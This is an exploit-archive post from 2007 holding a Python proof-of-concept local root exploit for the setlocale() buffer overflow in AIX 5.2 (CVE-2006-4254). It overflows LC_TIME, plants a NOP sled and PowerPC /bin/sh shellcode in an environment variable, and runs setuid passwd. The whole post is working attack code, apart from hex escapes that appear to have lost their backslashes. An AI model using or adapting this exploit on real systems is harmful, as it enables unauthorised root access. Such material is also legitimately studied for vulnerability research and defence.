setlocate-local.txt
Posted on 07 November 2007
# #setlocale() exploit for aix 5.2 ( CVE-2006-4254 ) #thomas.pollet@gmail.com # from os import execve bof="a"*580+"bbbbccccddddx2fxf2x28x2f" egg="x60"*2350 shellcode=( # by intropy <at> caughq.org "x7cxa5x2ax79" # xor. r5,r5,r5 "x40x82xffxfd" # bnel <shellcode> "x7fxe8x02xa6" # mflr r31 "x3bxffx01x20" # cal r31,0x120(r31) "x38x7fxffx08" # cal r3,-248(r31) "x38x9fxffx10" # cal r4,-240(r31) "x90x7fxffx10" # st r3,-240(r31) "x90xbfxffx14" # st r5,-236(r31) "x88x5fxffx0f" # lbz r2,-241(r31) "x98xbfxffx0f" # stb r5,-241(r31) "x4cxc6x33x42" # crorc cr6,cr6,cr6 "x44xffxffx02" # svca "/bin/sh" "x05") execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})